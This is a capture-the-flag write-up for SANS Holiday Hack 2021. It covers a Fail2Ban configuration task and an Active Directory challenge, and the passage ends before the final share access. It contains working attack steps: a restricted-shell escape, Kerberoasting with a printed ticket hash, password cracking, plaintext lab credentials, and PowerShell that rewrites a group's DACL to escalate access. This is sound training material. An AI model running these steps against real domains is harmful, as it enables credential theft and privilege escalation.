Holiday Hack 2021: Kerberoasting on an Open Fire
Objective
Terminal - HoHo … No
Challenge
Eve Snowshoes is waiting in Santa’s office with the HoHo…No terminal:
Hey there, how’s it going? I’m Eve Snowshoes.
Lately I’ve been spending a lot of cycles worrying about what’s going on next door.
Before that, I was checking out Fail2Ban.
It’s this slick log scanning tool for Apache web servers.
If you can complete this terminal challenge, I’d be happy to give you some things I’ve learned about Kerberoasting and Active Directory permissions!
Why don’t you do some work with Fail2Ban on this Cranberry Pi terminal first, then we’ll talk Kerberoasting and Active Directory. OK?
The terminal header is all about Fail2Ban:
Fail2Ban is designed to parse logs and have certain actions taken when a given log associated with a given IP happens too many times in a defined period. For example, if there are more than 5 failed SSH logins from the same IP in 2 minutes, block that IP for one hour in IP tables.
This challenge asks that I parse a custom log, looking for 10 or more failures in an hour, and pass the offending IPs to /root/naughtylist.
Solution
The full solution for this challenge is in this video:
Identify Malicious Logs
Using grep to look at the log, I identified four different types of malicious log entries:
- Failed login:
  2022-01-03 22:10:22 Failed login from 101.103.18.26 for alabaster
- Rejected:
  2022-01-03 22:10:29 Login from 20.252.236.61 rejected due to unknown user name
- Invalid:
  2022-01-03 22:10:30 Invalid heartbeat 'delta' from 68.175.124.205
- Malformed:
  2022-01-03 22:10:33 101.103.18.26 sent a malformed request
Configure Fail2Ban
Andy Smith gave a talk at this year’s KringleCon on Fail2Ban, and it’s a good walkthrough of how to configure it. I’ll need to create three files.
I’ll start with a filter, /etc/fail2ban/filter.d/df.conf:
[Definition]
failregex = Failed login from <HOST> for .+$
Login from <HOST> rejected due to unknown user name$
Invalid heartbeat '.+' from <HOST>$
<HOST> sent a malformed request$
The four lines are the four patterns to match in the log data; Fail2Ban substitutes its own IP-address regex for <HOST>. I can test the filter with fail2ban-regex (shown in the video).
Next, I need an action, which defines what happens when there’s a ban or unban, /etc/fail2ban/action.d/df.conf:
[Definition]
actionban = /root/naughtylist add <ip>
actionunban = /root/naughtylist del <ip>
Finally, to tie them together, a jail file that describes how they interact, /etc/fail2ban/jail.d/df.conf:
[df]
enabled = true
logpath = /var/log/hohono.log
findtime = 60m
maxretry = 10
filter = df
action = df
Run It
To put these in place, I’ll restart the Fail2Ban service (service fail2ban restart), and then I’ll run /root/naughtylist refresh to replay the logs and solve the challenge.
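To make the filter/jail semantics concrete, here is an added Python model of what the three files above ask Fail2Ban to do (this is my own illustration, not code from the challenge or from Fail2Ban): the four failregex patterns become Python regexes with <HOST> as a named group, and a per-host sliding window applies findtime=60m / maxretry=10 before emitting the actionban command. The log lines are constructed for the example, not taken from /var/log/hohono.log.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Python port of the four failregex lines in /etc/fail2ban/filter.d/df.conf.
# Fail2Ban's <HOST> placeholder becomes a named group; the timestamp prefix
# is parsed separately, much as Fail2Ban's datepattern does.
HOST = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"
FAIL_PATTERNS = [
    re.compile(r"Failed login from " + HOST + r" for .+$"),
    re.compile(r"Login from " + HOST + r" rejected due to unknown user name$"),
    re.compile(r"Invalid heartbeat '.+' from " + HOST + r"$"),
    re.compile(HOST + r" sent a malformed request$"),
]
TIMESTAMPED = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (.*)$")


def parse_line(line):
    """Return (timestamp, host) when a log line matches a failure pattern, else None."""
    m = TIMESTAMPED.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
    for pattern in FAIL_PATTERNS:
        hit = pattern.match(m.group(2))
        if hit:
            return ts, hit.group("host")
    return None


def find_naughty(lines, findtime=timedelta(minutes=60), maxretry=10):
    """Replay log lines (oldest first) and return the hosts that reach maxretry
    failures inside a sliding findtime window, in the order they were banned.
    Mirrors findtime=60m / maxretry=10 from the jail; an already-banned host is
    not counted again, as Fail2Ban would not re-ban it until the ban expires."""
    recent = defaultdict(deque)   # host -> timestamps still inside the window
    banned = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, host = parsed
        if host in banned:
            continue
        window = recent[host]
        window.append(ts)
        while ts - window[0] > findtime:   # drop events older than findtime
            window.popleft()
        if len(window) >= maxretry:
            banned.append(host)
    return banned


def ban_commands(lines):
    """The actionban line from action.d/df.conf, rendered for each banned host."""
    return [f"/root/naughtylist add {host}" for host in find_naughty(lines)]


def _entry(ts, message):
    return f"{ts:%Y-%m-%d %H:%M:%S} {message}"


# Constructed sample log for this example (not the challenge's real hohono.log).
_base = datetime(2022, 1, 3, 22, 0, 0)
SAMPLE_LOG = []
# 101.103.18.26: ten mixed failures within nine minutes -> banned
for i in range(10):
    msg = ("Failed login from 101.103.18.26 for alabaster" if i % 2 == 0
           else "101.103.18.26 sent a malformed request")
    SAMPLE_LOG.append(_entry(_base + timedelta(minutes=i), msg))
# 20.252.236.61: three rejections -> below maxretry
for i in range(3):
    SAMPLE_LOG.append(_entry(_base + timedelta(minutes=i),
                             "Login from 20.252.236.61 rejected due to unknown user name"))
# 68.175.124.205: ten bad heartbeats, one every 13 minutes -> never ten inside one hour
for i in range(10):
    SAMPLE_LOG.append(_entry(_base + timedelta(minutes=13 * i),
                             "Invalid heartbeat 'delta' from 68.175.124.205"))
# a successful heartbeat that must not match any failregex
SAMPLE_LOG.append(_entry(_base, "Valid heartbeat 'alpha' from 10.0.0.5"))
SAMPLE_LOG.sort()   # fixed-width timestamp prefix, so lexical order is time order

if __name__ == "__main__":
    for cmd in ban_commands(SAMPLE_LOG):
        print(cmd)
```

The third host shows why findtime matters: ten failures spread over two hours never put ten events into a single 60-minute window, so a jail with findtime=60m leaves it alone, which is the behaviour the challenge’s “10 or more failures in an hour” wording asks for.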
Kerberoasting on an Open Fire
Hints
Eve has gratitude and hints to offer:
Fantastic! Thanks for the help!
Hey, would you like to know more about Kerberoasting and Active Directory permissions abuse?
There’s a great talk by Chris Davis on this exact subject!
There are also plenty of resources available to learn more about Kerberoasting specifically.
If you have any trouble finding the domain controller on the 10.X.X.X network, remember that, when not running as root, nmap default probing relies on connecting to TCP 80 and 443.
Got a hash that won’t crack with your wordlist? OneRuleToRuleThemAll.rule is a great way to grow your keyspace.
Where’d you get your wordlist? CeWL might generate a great wordlist from the ElfU website, but it will ignore digits in terms by default.
So, apropos of nothing, have you ever known system administrators who store credentials in scripts? I know, I know, you understand the folly and would never do it!
The easy way to investigate Active Directory misconfigurations (for Blue and Red alike!) is with Bloodhound, but there are native methods as well.
Oh, and one last thing: once you’ve granted permissions to your user, it might take up to five minutes for it to propagate throughout the domain.
A record seven more hints unlock in my badge:
- Check out Chris Davis’ talk and scripts on Kerberoasting and Active Directory permissions abuse.
- Learn about Kerberoasting to leverage domain credentials to get usernames and crackable hashes for service accounts.
- There will be some 10.X.X.X networks in your routing tables that may be interesting. Also, consider adding -PS22,445 to your nmap scans to “fix” default probing for unprivileged scans.
- OneRuleToRuleThemAll.rule is great for mangling when a password dictionary isn’t enough.
- CeWL can generate some great wordlists from a website, but it will ignore digits in terms by default.
- Administrators often store credentials in scripts. These can be coopted by an attacker for other purposes!
- Investigating Active Directory errors is harder without Bloodhound, but there are native methods.
Solution
There’s a full walkthrough of solving this challenge in this video:
A summary of the steps follows here as well.
Get Creds
Visiting the page redirects to /register, which has a registration form.
On submitting data, I’m given a username and credentials for the grading server:
Escape the Limited Shell
When I connect, I’m in some kind of custom shell:
===================================================
= Elf University Student Grades Portal =
= (Reverts Everyday 12am EST) =
===================================================
1. Print Current Courses/Grades.
e. Exit
:
Entering 1:
0 Shortname Description Grade
==================================================
1 WHOL101 World Holiday Literature F
2 NPAR301 North Pole Art Appreciation D+
3 REIH201 Reindeer Husbandry F
4 GEOG101 Geometry of Gift-Wrapping B-
5 SLPE101 Sleigh Propulsion Engineering C+
Press Enter to continue...
Anything else clears and reprints the menu, except e, which exits, closing the SSH connection. Ctrl-z and Ctrl-c both print:
You may only type 'exit' to leave the exam
Ctrl-d, however, drops to a Python terminal:
===================================================
= Elf University Student Grades Portal =
= (Reverts Everyday 12am EST) =
===================================================
1. Print Current Courses/Grades.
e. Exit
: Traceback (most recent call last):
File "/opt/grading_system", line 41, in <module>
main()
File "/opt/grading_system", line 26, in main
a = input(": ").lower().strip()
EOFError
>>>
And I can drop to a bash shell:
>>> os.system("bash")
rncztspfgz@grades:~$
I can also update my user’s shell from the grading program to bash with chsh.
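The traceback above shows the root cause of the escape: input() raises EOFError on Ctrl-D, the menu loop never catches it, and the >>> prompt that follows the traceback shows the interpreter was left in interactive mode after the unhandled exception (the behaviour of python -i or PYTHONINSPECT), so the student lands in a REPL with os already imported. As an added example (my own code, not the challenge’s /opt/grading_system, which I only know from the one line in the traceback), here is a reconstruction of that loop beside a guarded version that turns EOF into a clean exit and keeps the “You may only type 'exit'” handling for Ctrl-C. The scripted reader stands in for input() so the behaviour can be exercised without a terminal.

```python
import sys

MENU = (
    "===================================================\n"
    "=        Elf University Student Grades Portal     =\n"
    "===================================================\n"
    "1. Print Current Courses/Grades.\n"
    "e. Exit\n"
)
GRADES = (
    "0 Shortname Description Grade\n"
    "1 WHOL101 World Holiday Literature F\n"
    "2 NPAR301 North Pole Art Appreciation D+\n"
    "3 REIH201 Reindeer Husbandry F\n"
)
LEAVE_MSG = "You may only type 'exit' to leave the exam\n"


def make_reader(responses):
    """Scripted stand-in for input(): returns responses in order, raises any
    exception object placed in the list (to simulate Ctrl-C), and raises
    EOFError once the responses run out, which is what input() does on Ctrl-D."""
    pending = list(responses)

    def read_line(prompt):
        if not pending:
            raise EOFError
        item = pending.pop(0)
        if isinstance(item, BaseException):
            raise item
        return item
    return read_line


def menu_loop_unguarded(read_line, write=lambda s: None):
    """Reconstruction (hypothetical) of the loop implied by the traceback:
    only 'e' returns; EOF propagates out as an exception."""
    while True:
        write(MENU)
        a = read_line(": ").lower().strip()
        if a == "e":
            return "exit"
        if a == "1":
            write(GRADES)


def menu_loop_guarded(read_line, write=lambda s: None):
    """Same loop, but EOF ends the session cleanly and an interrupt is
    answered with the portal's message instead of leaving the loop."""
    while True:
        write(MENU)
        try:
            a = read_line(": ").lower().strip()
        except EOFError:
            write("\nSession closed.\n")   # no traceback, nothing to drop into
            return "eof"
        except KeyboardInterrupt:
            write("\n" + LEAVE_MSG)
            continue
        if a == "e":
            return "exit"
        if a == "1":
            write(GRADES)


def session_outcome(loop, responses):
    """Run a menu loop against scripted input and report how it ended."""
    try:
        return loop(make_reader(responses))
    except EOFError:
        return "unhandled EOFError"


if __name__ == "__main__":
    print(session_outcome(menu_loop_unguarded, ["1"]))   # unhandled EOFError
    print(session_outcome(menu_loop_guarded, ["1"]))     # eof
    menu_loop_guarded(input, sys.stdout.write)           # interactive use
```

Catching EOFError is only half of the fix: a program used as a login shell should also not be started in a mode that falls back to an interactive interpreter, and should hold no more capability (such as an imported os) than the menu needs.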
Find Servers
This host’s IP is in the 172.17.0.0/24 subnet. Looking at the routing tables (as suggested by the hints), there are three 10.128.X.0/24 networks:
rncztspfgz@grades:~$ ip route
default via 172.17.0.1 dev eth0
10.128.1.0/24 via 172.17.0.1 dev eth0
10.128.2.0/24 via 172.17.0.1 dev eth0
10.128.3.0/24 via 172.17.0.1 dev eth0
172.17.0.0/16 dev eth0 proto kernel scope link src 172.17.0.2
nmap scanning will identify a bunch of hosts, but the two of most interest are DC01 and SHARE30, both on the elfu.local domain:
rncztspfgz@grades:~$ nmap -Pn -sCV 10.128.1.53
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-07 18:09 UTC
Nmap scan report for hhc21-windows-dc.c.holidayhack2021.internal (10.128.1.53)
Host is up (0.00057s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-07 18:09:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: elfu.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: elfu.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: ELFU
| NetBIOS_Domain_Name: ELFU
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: elfu.local
| DNS_Computer_Name: DC01.elfu.local
| DNS_Tree_Name: elfu.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-01-07T18:11:29+00:00
| ssl-cert: Subject: commonName=DC01.elfu.local
| Not valid before: 2021-10-28T19:21:37
|_Not valid after: 2022-04-29T19:21:37
|_ssl-date: 2022-01-07T18:12:09+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/7%Time=61D881CE%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-01-07T18:11:32
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.17 seconds
rncztspfgz@grades:~$ nmap -PS22,445 -sCV 10.128.3.30
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-07 18:37 UTC
Nmap scan report for 10.128.3.30
Host is up (0.00027s latency).
Not shown: 966 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 ce:7e:b4:4b:bc:b9:39:6f:10:d8:3f:f4:3f:6a:06:ef (RSA)
| 256 eb:a9:4b:ec:04:c0:7a:0e:a3:36:f7:4b:49:d7:de:bf (ECDSA)
|_ 256 c1:a9:ac:ad:69:13:b7:b1:23:c7:d4:cc:8f:32:1e:b0 (ED25519)
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.128.3.30/register
88/tcp open kerberos-sec Heimdal Kerberos (server time: 2022-01-07 18:37:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: ELFU)
389/tcp open ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08
|_Not valid after: 2023-09-29T19:30:08
|_ssl-date: 2022-01-07T18:37:25+00:00; -42s from scanner time.
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: ELFU)
464/tcp open kpasswd5?
636/tcp open ssl/ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08
|_Not valid after: 2023-09-29T19:30:08
|_ssl-date: 2022-01-07T18:37:51+00:00; -16s from scanner time.
1024/tcp open msrpc Microsoft Windows RPC
...[snip]...
1044/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3268/tcp open ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08
|_Not valid after: 2023-09-29T19:30:08
|_ssl-date: 2022-01-07T18:38:36+00:00; +29s from scanner time.
3269/tcp open ssl/ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08
|_Not valid after: 2023-09-29T19:30:08
|_ssl-date: 2022-01-07T18:37:00+00:00; -1m07s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/7%Time=61D8885C%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,2B,"\0\)\0\x06\x81\x80\0\x01\0\0\0\0\0\x01\x07version\x
SF:04bind\0\0\x10\0\x03\0\0\)\x02\0\0\0\0\0\0\0")%r(DNSStatusRequestTCP,E,
SF:"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");
Service Info: Host: SHARE30; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -13s, deviation: 31s, median: 0s
|_nbstat: NetBIOS name: SHARE30, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: share30
| NetBIOS computer name: SHARE30\x00
| Domain name: elfu.local
| FQDN: share30.elfu.local
|_ System time: 2022-01-07T18:37:59+00:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-01-07T18:37:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.92 seconds
SHARE30 has two interesting shares:
rncztspfgz@grades:~$ smbclient -L //10.128.3.30
Enter WORKGROUP\rncztspfgz's password:
Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
elfu_svc_shr Disk elfu_svc_shr
research_dep Disk research_dep
IPC$ IPC IPC Service (Samba 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
research_dep seems like where I’m probably trying to get eventually.
elfu_svc via Kerberoast
Because I have a domain user, I can find any kerberoastable accounts from the DC using the Impacket script that is conveniently installed on the grading server:
rncztspfgz@grades:~$ GetUserSPNs.py -request -dc-ip 10.128.1.53 elfu.local/rncztspfgz:'Iylbegxmf#'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------------- -------- -------- -------------------------- --------- ----------
ldap/elfu_svc/elfu elfu_svc 2021-10-29 19:25:04.305279 <never>
ldap/elfu_svc/elfu.local elfu_svc 2021-10-29 19:25:04.305279 <never>
ldap/elfu_svc.elfu.local/elfu elfu_svc 2021-10-29 19:25:04.305279 <never>
ldap/elfu_svc.elfu.local/elfu.local elfu_svc 2021-10-29 19:25:04.305279 <never>
$krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$da9854fa969fcfcd7ca524745b0d8bcf$5ad62e78b2fc539722b7c7d97e84dc0d06d585db187316f98eb3c0688b93100dc9eb42a76af01d9340e3a4d527a011c421b22eeda687092d06fe0a44a6b84572abf982acc90e8eefffd31549543dc883af910f2a78da903f231f488028a537179560d3522ad116da25589d9d28e08b5f7f2575
20b4775f09f0e20484b7757250f8f4616748fb1aa0abb7c12c45c4f58ffb5d2162506daebcd651a2d637eff520b974d8021ea5cd5a9d4648ff204f528149bbf7905223b6cb2eeea84ee8e1159da8918bbb33d679d318b4d8fbaebb70b57538a5126217acd70934317d2dea4e27c45fa4089326e11deb13fe2bbd4134f725ffc141040893dc27413feb4e2d4a4f713f669d4aadb50795d0d65380febfce00b
bdc0ab1e119e7a1710035e2081628d7b85be3773e20439741f23c6bc6ce6115f89b4250459b12f70c76e3c7dff17f9de68d36aef4b8ab96da1d0453d523374309c315db2e115e6365400eac57b1f61c8db785354bf906f86322a9c52d32d36ac8ae1df306a51be5a06a70b06bcfda767515be9f2bb7636354d0e0474dba0662ea641c108c0cd3825c9dda78df919cd21cd432684110f0335118d42272fb2a
97b76d5dac062ab7732a159b5b2893fe9e9957b7e1a93b11b32ebded0c8d94f2666454ce515518e7f442b9348f40259e54bd1d385c3206076ba410e7426f50067ce0150e9395ea7e1b5345b998be8d3274e941111346c87b94960ff79360d5feebcce8cb90850682b30d2c054847daac86409d126d418ce37217870c7d4925790fb64f7eb1fa1af2e6d773d535c7a7900eb15dba4f1014a88957d9914ff04
b86c2d9636928126983c1fcfa351f7ec2e996682c662c0f40854b1f96d5900179bfa4d703e82d7d3064375c9676d62717b8dd28a10df4e42c9fa8695441d11f4ec16642f69fced598720d5ea2a66e0a85eb02c72a9cfe778ffbd7ed23597a5e16e45c176e395a035122e08c926f7dc19ac8810e9f664ced36f34f5dda2af81fcabdb0b73fb7c00eea782efc03798b815748c93e2a7bda911ed39ec20df3b5
92190efa9c92cf98f2555749b0e442020661cc5858cddbc32102aa4c91cb198b4bd7eaa779e79bf85f88f8eb59d3beff250f3cd94ac1dacab92a127d337d67d127e673386ca3d5b807c1a9b44e5e039b04e3daaf02fecfc62d1b2e76ce25ab9b263054645eb2eeb7e4551a4a07924132a8288e2ac2bf0237b570722bca9b262b6db812dd2eca92a9b46340ea14bf1b4a0a0c9b004ffcc92853451556f6c3a
97b792fe3279b63d4283dab83554a6d5174ed800e767b6bc53fe393e88d963497811d08e859be078dd9c073a680fe98193edb75c9fccdbc778d76355faea27c95dc997de855e8bccadeab6d25dfdab5496f0e5fbc795815b625a8c7b0f74e428e64cf4cf13b5e90f87d3ffd8d0d4ab01e660087127b53486574
It returns a hash for the elfu_svc account, which matches the share name from SHARE30.
Based on the hints, I’ll generate a wordlist from the ElfU website using cewl:
$ /opt/CeWL/cewl.rb --with-numbers https://register.elfu.org/register > wordlist
I’ll use the wordlist plus the hash and the rule suggested in the hints to crack the hash with Hashcat:
$ hashcat -m 13100 -r OneRule.rule hash wordlist
...[snip]...
The password is “Snow2021!”.
remote_elf
I can’t access the DC or the research share, but I can access the elfu_svc_shr share:
rncztspfgz@grades:~$ smbclient //10.128.3.30/elfu_svc_shr -U elfu.local\\elfu_svc
Enter ELFU.LOCAL\elfu_svc's password:
Try "help" to get a list of possible commands.
smb: \>
The share has 160 PowerShell scripts in it. I’ll download them all and grep through them for things of interest. When I look for elfu, I get a hit:
rncztspfgz@grades:~/scripts$ grep -i elfu *
GetProcessInfo.ps1:$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
Not only is that a hit, but the script is creating a credential object. The script just runs the Get-Process command on the DC as remote_elf:
$SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
Invoke-Command -ComputerName 10.128.1.53 -ScriptBlock { Get-Process } -Credential $aCred -Authentication Negotiate
I’ll use these creds to get a PS session on the DC as remote_elf:
PS /home/rncztspfgz/scripts> $SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQ
BlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
PS /home/rncztspfgz/scripts> $aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
PS /home/rncztspfgz/scripts> $aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
PS /home/rncztspfgz/scripts> Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred -Authentication Negotiate
[10.128.1.53]: PS C:\Users\remote_elf\Documents>
Bloodhound
Now with three domain users owned, I’ll take a look at what they can control (I actually ran this towards the beginning, but now is when it’s time to look).
I can’t get files to/from the DC, but I can use bloodhound.py from the grading server (after using scp to get it there):
rncztspfgz@grades:~/bh$ python3 ../BloodHound.py/bloodhound.py -c all -u elfu_svc -d elfu.local -p 'Snow2021!' -dc dc01.elfu.local
INFO: Found AD domain: elfu.local
INFO: Connecting to LDAP server: dc01.elfu.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 238 computers
INFO: Connecting to LDAP server: dc01.elfu.local
INFO: Found 246 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.elfu.local
INFO: Querying computer: share30.elfu.local
INFO: Skipping enumeration for share30.elfu.local since it could not be resolved.
INFO: Done in 00M 01S
I’ll scp the resulting files back to my host and open them in BloodHound. After marking each of the users I control as owned, I’ll look at the “First Degree Object Control” for each. remote_elf has a really interesting one:
Access Research Department Share
With WriteDacl on the Research Department group, I can add users to it. PowerView makes this easy, but since I can’t get files to the DC, I can use the scripts from Chris Davis’ gist. The first set of commands runs as remote_elf to give GenericAll to my user over the group:
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> Add-Type -AssemblyName System.DirectoryServices
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $username = "rncztspfgz"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $propGUID = [guid]'00000000-0000-0000-0000-000000000000'
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $secOptions = $domainDirEntry.get_Options()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.RefreshCache()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.CommitChanges()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.dispose()
Next, I’ll use that new power to add myself to the group:
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> Add-Type -AssemblyName System.DirectoryServices
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $username = "rncztspfgz"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $password = "Iylbegxmf#"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $user = New-Object System.Security.Principal.NTAccount("elfu.local\$username")
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $b=New-Object byte[] $sid.BinaryLength
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $sid.GetBinaryForm($b,0)
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $hexSID=[BitConverter]::ToString($b).Replace('-','')
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.Add("LDAP://<SID=$hexSID>")
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.CommitChanges()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.dispose()
Once that propagates (can take up to five minutes), I can connect to the share on SHARE30:
